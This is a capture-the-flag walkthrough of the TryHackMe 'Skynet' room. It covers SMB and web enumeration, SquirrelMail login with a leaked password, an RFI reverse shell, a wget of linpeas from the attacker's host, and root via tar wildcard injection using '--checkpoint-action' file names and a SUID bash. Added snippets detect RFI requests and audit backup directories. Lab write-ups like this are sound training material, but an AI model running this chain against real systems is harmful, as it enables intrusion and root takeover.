[TryHackMe] Skynet Walkthrough Using Remote File Inclusion : Benjamin Reitz
by: Benjamin Reitz
How I used a remote file inclusion vulnerability to hack and root the Terminator’s computer
CHALLENGE OVERVIEW
- Link: https://tryhackme.com/room/skynet
- Difficulty: Easy
- Target: user and /root flags
- Highlight: exploiting a remote file inclusion vulnerability to spawn a reverse shell
- Tools used: smbclient, smbmap, gobuster, metasploit
- Tags: gobuster, smb, rfi, squirrelmail
BACKGROUND
In this walkthrough, we will root a terminator-themed capture-the-flag (CTF) challenge box.
IPs
export targetIP=10.10.144.117
export myIP=10.6.2.23
ENUMERATION
sudo nmap -p- -T5 -A -oN nmapscan.txt 10.10.144.117 -Pn
NMAP SCAN RESULTS
Starting Nmap 7.92 ( https://nmap.org ) at 2023-01-23 18:33 EST
Nmap scan report for 10.10.144.117
Host is up (0.084s latency).
Not shown: 65529 closed tcp ports (reset)
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 7.2p2 Ubuntu 4ubuntu2.8 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
| 2048 99:23:31:bb:b1:e9:43:b7:56:94:4c:b9:e8:21:46:c5 (RSA)
| 256 57:c0:75:02:71:2d:19:31:83:db:e4:fe:67:96:68:cf (ECDSA)
|_ 256 46:fa:4e:fc:10:a5:4f:57:57:d0:6d:54:f6:c3:4d:fe (ED25519)
80/tcp open http Apache httpd 2.4.18 ((Ubuntu))
|_http-server-header: Apache/2.4.18 (Ubuntu)
|_http-title: Skynet
110/tcp open pop3 Dovecot pop3d
|_pop3-capabilities: RESP-CODES CAPA PIPELINING UIDL TOP SASL AUTH-RESP-CODE
139/tcp open netbios-ssn Samba smbd 3.X - 4.X (workgroup: WORKGROUP)
143/tcp open imap Dovecot imapd
|_imap-capabilities: IMAP4rev1 ID LOGIN-REFERRALS have LOGINDISABLEDA0001 capabilities more post-login ENABLE listed LITERAL+ Pre-login OK IDLE SASL-IR
445/tcp open netbios-ssn Samba smbd 4.3.11-Ubuntu (workgroup: WORKGROUP)
Aggressive OS guesses: Linux 3.10 - 3.13 (95%), Linux 5.4 (95%), ASUS RT-N56U WAP (Linux 3.4) (95%), Linux 3.16 (95%), Linux 3.1 (93%), Linux 3.2 (93%), AXIS 210A or 211 Network Camera (Linux 2.6.17) (92%), Sony Android TV (Android 5.0) (92%), Android 5.0 - 6.0.1 (Linux 3.4) (92%), Android 5.1 (92%)
No exact OS matches for host (test conditions non-ideal).
Network Distance: 4 hops
Service Info: Host: SKYNET; OS: Linux; CPE: cpe:/o:linux:linux_kernel
Host script results:
|_clock-skew: mean: 6h59m59s, deviation: 3h27m51s, median: 4h59m59s
| smb2-security-mode:
| 3.1.1:
|_ Message signing enabled but not required
|_nbstat: NetBIOS name: SKYNET, NetBIOS user: <unknown>, NetBIOS MAC: <unknown> (unknown)
| smb2-time:
| date: 2023-01-24T04:40:37
|_ start_date: N/A
| smb-security-mode:
| account_used: guest
| authentication_level: user
| challenge_response: supported
|_ message_signing: disabled (dangerous, but default)
| smb-os-discovery:
| OS: Windows 6.1 (Samba 4.3.11-Ubuntu)
| Computer name: skynet
| NetBIOS computer name: SKYNET\x00
| Domain name: \x00
| FQDN: skynet
|_ System time: 2023-01-23T22:40:36-06:00
TRACEROUTE (using port 554/tcp)
HOP RTT ADDRESS
1 13.67 ms 10.6.0.1
2 ... 3
4 81.31 ms 10.10.144.117
OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 443.46 seconds
DIRB SCAN RESULTS
The SquirrelMail directory looks interesting. We’ll check that out in a minute.
ENUMERATE THE SMB SHARE WITH NMAP SCAN:
nmap --script smb-enum-shares -p 139 10.10.144.117
Output:
Starting Nmap 7.92 ( https://nmap.org ) at 2023-01-23 18:56 EST
Nmap scan report for 10.10.144.117
Host is up (0.086s latency).
PORT STATE SERVICE
139/tcp open netbios-ssn
Host script results:
| smb-enum-shares:
| account_used: guest
| \\10.10.144.117\IPC$:
| Type: STYPE_IPC_HIDDEN
| Comment: IPC Service (skynet server (Samba, Ubuntu))
| Users: 1
| Max Users: <unlimited>
| Path: C:\tmp
| Anonymous access: READ/WRITE
| Current user access: READ/WRITE
| \\10.10.144.117\anonymous:
| Type: STYPE_DISKTREE
| Comment: Skynet Anonymous Share
| Users: 0
| Max Users: <unlimited>
| Path: C:\srv\samba
| Anonymous access: READ/WRITE
| Current user access: READ/WRITE
| \\10.10.144.117\milesdyson:
| Type: STYPE_DISKTREE
| Comment: Miles Dyson Personal Share
| Users: 0
| Max Users: <unlimited>
| Path: C:\home\milesdyson\share
| Anonymous access: <none>
| Current user access: <none>
| \\10.10.144.117\print$:
| Type: STYPE_DISKTREE
| Comment: Printer Drivers
| Users: 0
| Max Users: <unlimited>
| Path: C:\var\lib\samba\printers
| Anonymous access: <none>
|_ Current user access: <none>
smbmap -H 10.10.144.117
[+] Guest session IP: 10.10.144.117:445 Name: 10.10.144.117
Disk Permissions Comment
---- ----------- -------
print$ NO ACCESS Printer Drivers
anonymous READ ONLY Skynet Anonymous Share
milesdyson NO ACCESS Miles Dyson Personal Share
IPC$ NO ACCESS IPC Service (skynet server (Samba, Ubuntu))
LOGIN TO SAMBA SHARES AS ANONYMOUS
smbclient //10.10.144.117/anonymous
Password for [WORKGROUP\kalisurfer]:
Try "help" to get a list of possible commands.
smb: \> ls
. D 0 Thu Nov 26 11:04:00 2020
.. D 0 Tue Sep 17 03:20:17 2019
attention.txt N 163 Tue Sep 17 23:04:59 2019
logs D 0 Wed Sep 18 00:42:16 2019
We grab log1.txt (a password list) from the logs directory and note the username milesdyson.
WALK THE WEBSITE
We discovered a login portal for SquirrelMail from the dirb scan. Let’s check it out now in our browser:
http://10.10.144.117/squirrelmail
Loading the site reveals a version number. A quick search points to a local file inclusion vulnerability.
SquirrelMail version 1.4.23 [SVN] Squirrelmail 1.4.x - 'Redirect.php' Local File Inclusion
LOG IN TO SQUIRRELMAIL
The first password on the list in log1.txt (the file from the SMB share) works! We are now in milesdyson’s email account and see two interesting emails.
serenakogan@skynet 01100010 01100001 01101100 01101100 01110011 00100000 01101000 01100001 01110110 01100101 00100000 01111010 01100101 01110010 01101111 00100000 01110100 01101111 00100000 01101101 01100101 00100000 01110100 01101111 00100000 01101101 01100101 00100000 01110100 01101111 00100000 01101101 01100101 00100000 01110100 01101111 00100000 01101101 01100101 00100000 01110100 01101111 00100000 01101101 01100101 00100000 01110100 01101111 00100000 01101101 01100101 00100000 01110100 01101111 00100000 01101101 01100101 00100000 01110100 01101111 00100000 01101101 01100101 00100000 01110100 01101111 skynet@skynet new smb password: )s{A&2Z=F^n_E.B`
LOGIN TO SMB SHARE AS milesdyson
smbclient //$targetIP/milesdyson -U milesdyson
Password for [WORKGROUP\milesdyson]:
Try "help" to get a list of possible commands.
smb: \> ls
. D 0 Tue Sep 17 05:05:47 2019
.. D 0 Tue Sep 17 23:51:03 2019
Improving Deep Neural Networks.pdf N 5743095 Tue Sep 17 05:05:14 2019
Natural Language Processing-Building Sequence Models.pdf N 12927230 Tue Sep 17 05:05:14 2019
Convolutional Neural Networks-CNN.pdf N 19655446 Tue Sep 17 05:05:14 2019
notes D 0 Tue Sep 17 05:18:40 2019
Neural Networks and Deep Learning.pdf N 4304586 Tue Sep 17 05:05:14 2019
Structuring your Machine Learning Project.pdf N 3531427 Tue Sep 17 05:05:14 2019
9204224 blocks of size 1024. 5831424 blocks available
Let’s grab the important.txt file:
get important.txt
Reading through its contents, we are pointed toward a hidden beta CMS directory:
/45kra24zxs28v3yd
GOBUSTER FOR DIRECTORY SNIFFING
We’ll further enumerate the hidden beta CMS directory now with gobuster.
gobuster dir -u http://10.10.221.72/45kra24zxs28v3yd/ -w /usr/share/wordlists/dirb/common.txt
===============================================================
Gobuster v3.1.0
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@firefart)
===============================================================
[+] Url: http://10.10.169.173/45kra24zxs28v3yd/
[+] Method: GET
[+] Threads: 10
[+] Wordlist: /usr/share/wordlists/dirb/common.txt
[+] Negative Status codes: 404
[+] User Agent: gobuster/3.1.0
[+] Timeout: 10s
===============================================================
2023/01/24 09:52:22 Starting gobuster in directory enumeration mode
===============================================================
/.hta (Status: 403) [Size: 278]
/.htaccess (Status: 403) [Size: 278]
/.htpasswd (Status: 403) [Size: 278]
/administrator (Status: 301) [Size: 339] [--> http://10.10.169.173/45kra24zxs28v3yd/administrator/]
/index.html (Status: 200) [Size: 418]
===============================================================
2023/01/24 09:53:04 Finished
===============================================================
ADMINISTRATOR PORTAL DISCOVERED!
http://10.10.169.173/45kra24zxs28v3yd/administrator/
IDENTIFY A KNOWN VULNERABILITY
Looking up the service name shows us that there is a remote file inclusion vulnerability.
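Two defender-side checks for the remote file inclusion bug class identified above, added here as an example and not part of the original walkthrough: a filter that pulls RFI-style requests out of access-log lines, and a check of the php.ini setting (allow_url_include) that lets include() fetch code over HTTP. The log lines and the index.php?page= parameter are constructed for the example; the original post does not name the vulnerable parameter.

```shell
# POSIX sh. Added example; function names are my own.

# detect_rfi_requests: read web-server access-log lines on stdin and print the
# ones whose query string passes a remote URL (plain or percent-encoded) or a
# php:// / data: stream wrapper as a parameter value, which is how a remote
# include is triggered. Exit status 0 when at least one line matched.
detect_rfi_requests() {
    grep -Ei '[?&][^ "]*=(https?|ftp)(://|%3a%2f%2f)|[?&][^ "]*=(php://|data:)'
}

# count_rfi_requests: same filter, but print only the number of matching lines.
count_rfi_requests() {
    detect_rfi_requests | wc -l | tr -d ' '
}

# php_allows_url_include: read php.ini text on stdin; exit 0 when
# allow_url_include is switched on (the setting an RFI needs), 1 otherwise.
php_allows_url_include() {
    grep -Eiq '^[[:space:]]*allow_url_include[[:space:]]*=[[:space:]]*(on|1|true|yes)'
}

# Constructed sample log: one normal request, two RFI-style requests (one of
# them percent-encoded) and one harmless use of the same parameter.
SAMPLE_LOG='10.6.2.23 - - [24/Jan/2023:09:55:01 -0500] "GET /45kra24zxs28v3yd/administrator/ HTTP/1.1" 200 1234
10.6.2.23 - - [24/Jan/2023:09:55:09 -0500] "GET /index.php?page=http://10.6.2.23:8000/shell.txt HTTP/1.1" 200 56
10.6.2.23 - - [24/Jan/2023:09:55:20 -0500] "GET /index.php?page=HTTP%3A%2F%2F10.6.2.23%3A8000%2Fshell.txt HTTP/1.1" 200 56
10.6.2.23 - - [24/Jan/2023:09:56:02 -0500] "GET /index.php?page=about HTTP/1.1" 200 420'

# Usage on the constructed sample: prints the two RFI-style request lines.
printf '%s\n' "$SAMPLE_LOG" | detect_rfi_requests
```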
SPAWN A REVERSE SHELL WITH THE PENTEST MONKEY PHP SHELL AND REMOTE FILE INCLUSION
After preparing a basic PHP reverse shell and serving it with a simple HTTP server, we go to our browser and load the address:
STABILIZE THE SHELL
python -c 'import pty;pty.spawn("/bin/bash")';
ENUMERATE WITH LINPEAS
After downloading linpeas.sh and serving it with the simple HTTP server, we can copy it over to the target machine’s /tmp folder with wget http://$myIP:port/linpeas.sh.
$ ./linpeas.sh
linpeas-ng by carlospolop
Starting linpeas. Caching Writable Folders...
═══════════════════════════════╣ Basic information ╠═══════════════════════════════
OS: Linux version 4.8.0-58-generic (buildd@lgw01-21) (gcc version 5.4.0 20160609 (Ubuntu 5.4.0-6ubuntu1~16.04.4) ) #63~16.04.1-Ubuntu SMP Mon Jun 26 18:08:51 UTC 2017
User & Groups: uid=33(www-data) gid=33(www-data) groups=33(www-data)
Hostname: skynet
Writable folder: /dev/shm
[+] /bin/ping is available for network discovery (linpeas can discover hosts, learn more with -h)
[+] /bin/bash is available for network discovery, port scanning and port forwarding (linpeas can discover hosts, scan ports, and forward ports. Learn more with -h)
[+] /bin/nc is available for network discovery & port scanning (linpeas can discover hosts and scan ports, learn more with -h)
Caching directories . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . DONE
══════════════════════════════╣ System Information ╠══════════════════════════════
╔══════════╣ Operative system
╚ https://book.hacktricks.xyz/linux-hardening/privilege-escalation#kernel-exploits
Linux version 4.8.0-58-generic (buildd@lgw01-21) (gcc version 5.4.0 20160609 (Ubuntu 5.4.0-6ubuntu1~16.04.4) ) #63~16.04.1-Ubuntu SMP Mon Jun 26 18:08:51 UTC 2017
Distributor ID: Ubuntu
Description: Ubuntu 16.04.6 LTS
Release: 16.04
Codename: xenial
╔══════════╣ Sudo version
╚ https://book.hacktricks.xyz/linux-hardening/privilege-escalation#sudo-version
Sudo version 1.8.16
╔══════════╣ CVEs Check
Vulnerable to CVE-2021-4034
Potentially Vulnerable to CVE-2022-2588
---abbreviated ---
THE MOST RELEVANT INFO FROM LINPEAS (abbreviated):
- Vulnerable to CVE-2021-4034
- Possibly vulnerable to CVE-2022-2588
https://github.com/carlospolop/PEASS-ng/releases/download/20230122/linpeas.sh
[+] [CVE-2017-16995] eBPF_verifier
Details: https://ricklarabee.blogspot.com/2018/07/ebpf-and-analysis-of-get-rekt-linux.html
Exposure: highly probable
Tags: debian=9.0{kernel:4.9.0-3-amd64},fedora=25|26|27,ubuntu=14.04{kernel:4.4.0-89-generic},[ ubuntu=(16.04|17.04) ]{kernel:4.(8|10).0-(19|28|45)-generic}
Download URL: https://www.exploit-db.com/download/45010
Comments: CONFIG_BPF_SYSCALL needs to be set && kernel.unprivileged_bpf_disabled != 1
FURTHER ENUMERATION
Let’s probe a bit more into this machine for some of the common Linux privilege escalation pathways.
CHECK CRONJOBS
cat /etc/crontab
Output:
# m h dom mon dow user command
*/1 * * * * root /home/milesdyson/backups/backup.sh
17 * * * * root cd / && run-parts --report /etc/cron.hourly
25 6 * * * root test -x /usr/sbin/anacron || ( cd / && run-parts --report /etc/cron.daily )
47 6 * * 7 root test -x /usr/sbin/anacron || ( cd / && run-parts --report /etc/cron.weekly )
52 6 1 * * root test -x /usr/sbin/anacron || ( cd / && run-parts --report /etc/cron.monthly )
#
The first job in the list runs every minute as root and simply executes backup.sh. Let’s find out what that file does.
We can see that backup.sh starts a new shell, changes directory to /var/www/html, creates a tarball of all the files in /var/www/html and stores it in /home/milesdyson/backups/backup.tgz.
The * is a wildcard that the shell expands to every file name in the current directory, so each name becomes a separate argument to tar. We can exploit this by adding our own files whose names tar interprets as options, which makes the cron job run our script, magic.sh, each time backup.sh creates the tarball every minute.
PLAN AND CARRY OUT PRIVILEGE ESCALATION
First, we’ll create the magic.sh file, which adds the SUID bit to /bin/bash. After setting this up and waiting at least one minute for the cron job, the next shell we spawn with /bin/bash -p (privileged mode, which keeps the SUID-granted effective UID) is a root shell.
printf '#!/bin/bash\nchmod +s /bin/bash' > magic.sh
Next, let’s use echo to create two more files with unusual names; these are what make the tarball creation process trigger our magic.sh program and add the SUID bit to /bin/bash.
echo "/var/www/html" > "--checkpoint-action=exec=sh magic.sh"
echo "/var/www/html" > --checkpoint=1
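A defender-side check for the cron job weakness just described, plus the hardened form of its tar call, added here as an example (not code from the walkthrough or the room): audit_backup_dir lists option-looking file names in the directory a backup job archives, and safe_backup archives a directory without ever letting the shell expand file names into tar's argument list. Function names are my own; the directory used in the test is constructed.

```shell
# POSIX sh. Added example; function names are my own.

# audit_backup_dir: print entries in a directory whose names begin with "-".
# When a script runs "tar czf backup.tgz *" from inside that directory, the
# shell expands such names into tar's argument list and tar parses them as
# options (this is exactly what the --checkpoint files above rely on).
# Exit status 1 when at least one such entry exists, 0 when the directory is clean.
audit_backup_dir() {
    dir="$1"
    found=0
    for f in "$dir"/-*; do
        [ -e "$f" ] || continue          # the glob matched nothing
        printf 'option-like file name: %s\n' "$f"
        found=1
    done
    return "$found"
}

# safe_backup: archive the contents of "$1" into the file "$2".
# "-C" enters the directory, "--" ends option processing, and "." names the
# contents as a single literal argument, so no file name is ever seen by
# tar's option parser. The walkthrough's job wrote a .tgz; plain tar is used
# here so the example depends only on tar itself.
safe_backup() {
    src="$1"
    dest="$2"
    tar -cf "$dest" -C "$src" -- .
}
```

Run audit_backup_dir against the directory a root cron job archives; any hit means a low-privileged user who can write there can influence how tar is invoked.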
USER FLAG
Let’s grab the user flag from /home/milesdyson:
$ cat user.txt
7c—-omitted—----07
ROOT FLAG
cat /root/root.txt
3f—-omitted—----49
TAKE-AWAYS
Takeaway #1 – The simpler solution is usually the better solution. I wasted a lot of time trying to get Metasploit to catch the reverse shell and start a meterpreter session.
In the end, I learned I had overlooked setting the payload on the msfconsole listener (exploit(multi/handler)) to match that of my reverse shell payload.
It’s not listed when you search “options”, but it is still necessary to set it to be able to properly catch the shell and start a meterpreter session. I used a basic shell session to root the box, and all of that precious time spent on metasploit didn’t help us get root access.
Takeaway #2 – Remote file inclusion vulnerabilities allow threat actors to carry out arbitrary code execution. In practice, this means that your machine can be quickly compromised, all the way down to the root user.
January 30, 2023 at 10:26PM
The original post is available in Finxter by Benjamin Reitz